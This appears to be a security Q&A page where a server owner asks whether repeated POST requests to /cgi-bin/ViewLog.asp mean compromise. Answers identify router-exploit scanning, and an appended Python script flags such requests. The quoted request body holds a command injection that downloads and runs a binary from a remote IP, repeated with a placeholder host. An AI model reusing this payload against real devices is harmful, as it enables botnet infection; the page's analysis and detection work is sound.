AnswerBun.com

Constant POST request spam to /cgi-bin/ViewLog.asp endpoint

Information Security Asked on December 26, 2020

I’ve got a DigitalOcean server that I use for different temporary servers. Lately I’ve found that sometimes I get a constant spam of the following requests:

POST http://127.0.0.1/cgi-bin/ViewLog.asp

Headers:
    Host: 127.0.0.1
    Connection: keep-alive
    Accept-Encoding: gzip, deflate
    Accept: */*
    User-Agent: B4ckdoor-owned-you
    Content-Length: 176
    Content-Type: application/x-www-form-urlencoded

Body:
{
    " remote_submit_Flag": "1", // Space is not a typo
    "remote_syslog_Flag": "1",
    "RemoteSyslogSupported": "1",
    "LogFlag": "0",
    "remote_host": ";cd /tmp;wget http://152.44.44.68/d/xd.arm7;chmod 777 xd.arm7;./xd.arm7;rm -rf xd.arm"
}

Which does not really bother me since I run Node.js servers only. What bothers me is the repetition of the attack and the Host header (although I believe this one can be faked).

I used to run a DNS server that defaulted to Google DNS, which I left unattended for some time, and it gathered 1.5TB of traffic in one month. The named -v shows version 9.11.3-1ubuntu1.12-Ubuntu.

Is the server compromised?

2 Answers

It looks like an automated search for vulnerable machines over the 'net.

The "127.0.0.1" host can be a faked part of the HTTP request that comes from some other address. 127.0.0.1 (localhost) gets fewer security checks in a lot of networked systems.

It is rather unusual, but not absolutely pointless for someone that already can execute code on your machine to scan for vulnerabilities from inside - he is already in.

You may as well look at the HTTP access log and see how this request is logged.


As for DNS: unless you know what you are doing, don't run public DNS.

p.s. no one can say if your machine is compromised, but since it is for temporary use, it is better to reinstall it.

Answered by fraxinus on December 26, 2020

You are right about the fact that the Host header can easily be faked; however, I assume that you've got the POST http://127.0.0.1/cgi-bin/ViewLog.asp right from your logs, and that indicates that the requests come from (or via) your localhost indeed.
Some attacker code might try to exploit:

https://www.exploit-db.com/exploits/43884

which is aimed at (rebranded) Zyxel and Billion routers. This attack is unlikely to cause any harm to you as you're obviously not running your node.js stuff on a router, however the sole fact that something uncontrolled seems to originate from (or be forwarded by) your localhost should be investigated.

Answered by lab9 on December 26, 2020
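A small triage script, added here as an example and not part of either answer, that applies the points both answers make to request records: it flags the /cgi-bin/ViewLog.asp endpoint, a shell-metacharacter payload in the remote_host parameter, a Host header of 127.0.0.1 on a request whose client IP is not loopback (the spoofed-Host case), and the scanner User-Agent from the question. The sample requests and the field names (client_ip, host, path, user_agent, body) are constructed; the download host in the payload is a placeholder.

```python
from __future__ import annotations
from ipaddress import ip_address
from urllib.parse import parse_qs

# Constructed sample requests (not real log lines). The first mirrors the
# request in the question, with the download host replaced by a placeholder.
SAMPLE_REQUESTS = [
    {"client_ip": "203.0.113.45", "host": "127.0.0.1", "path": "/cgi-bin/ViewLog.asp",
     "user_agent": "B4ckdoor-owned-you",
     "body": "remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0"
             "&remote_host=%3Bcd+%2Ftmp%3Bwget+http%3A%2F%2FPLACEHOLDER-HOST%2Fd%2Fxd.arm7"
             "%3Bchmod+777+xd.arm7%3B.%2Fxd.arm7"},
    {"client_ip": "198.51.100.7", "host": "app.example.org", "path": "/api/login",
     "user_agent": "Mozilla/5.0", "body": "user=alice&password=hunter2"},
    {"client_ip": "127.0.0.1", "host": "127.0.0.1", "path": "/healthz",
     "user_agent": "curl/7.68.0", "body": ""},
]

SHELL_META = frozenset(";|`&$")          # metacharacters that end one command and start another
TARGET_PATH = "/cgi-bin/ViewLog.asp"     # endpoint probed by the router exploit (EDB 43884)

def is_loopback(ip: str) -> bool:
    """True for 127.0.0.0/8 and ::1; False for anything else, including non-addresses."""
    try:
        return ip_address(ip).is_loopback
    except ValueError:
        return False

def classify(req: dict) -> list[str]:
    """Return the reasons a request matches the scanner traffic described on the page.
    An empty list means nothing in this request looked suspicious."""
    reasons = []
    if req["path"] == TARGET_PATH:
        reasons.append("probe of ViewLog.asp endpoint (Zyxel/Billion router exploit path)")
    # Parse the form body; remote_host is the field the exploit injects commands into.
    params = parse_qs(req.get("body", ""), keep_blank_values=True)
    for value in params.get("remote_host", []):
        if any(c in SHELL_META for c in value) or "wget " in value:
            reasons.append("command-injection payload in remote_host parameter")
            break
    # Host: 127.0.0.1 from a non-loopback client is a forged Host header, not local origin.
    if is_loopback(req["host"]) and not is_loopback(req["client_ip"]):
        reasons.append("Host header claims 127.0.0.1 but client IP is remote (spoofed Host)")
    if req.get("user_agent") == "B4ckdoor-owned-you":
        reasons.append("known scanner User-Agent")
    return reasons

def triage(requests: list[dict]) -> dict[str, list[str]]:
    """Map each flagged client IP to its findings; clean requests are dropped."""
    return {r["client_ip"]: reasons for r in requests if (reasons := classify(r))}

if __name__ == "__main__":
    for ip, reasons in triage(SAMPLE_REQUESTS).items():
        print(ip, "->", "; ".join(reasons))
```

If the flagged client IP in your own access log is a real loopback address rather than a remote one, that is the case lab9 describes and the source process on the host itself needs to be identified.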
